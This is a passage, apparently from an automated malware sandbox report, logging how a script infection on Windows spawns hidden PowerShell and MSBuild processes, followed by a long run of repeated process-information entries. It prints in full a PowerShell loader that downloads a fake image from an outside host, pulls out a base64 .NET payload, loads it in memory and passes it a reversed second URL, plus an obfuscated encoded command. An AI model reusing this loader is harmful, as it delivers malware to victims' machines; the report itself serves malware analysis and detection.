[System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.jhg/moc.ur.wsakodmob//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.jhg/moc.ur.wsakodmob//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAABE50942 push E95B71D0h; ret	14_2_00007FFAABE509C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_02EA7DA0 push eax; iretd	18_2_02EA7DA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_07415708 pushfd ; iretd	18_2_07415709

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\5E1F5B763F5B70F50208 66DBE3B90371FE58CAA957E83C1C1F0ACCE941A36CF140A0F07E64403DD13303

Potential evasive JS / VBS script found (domain check)

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
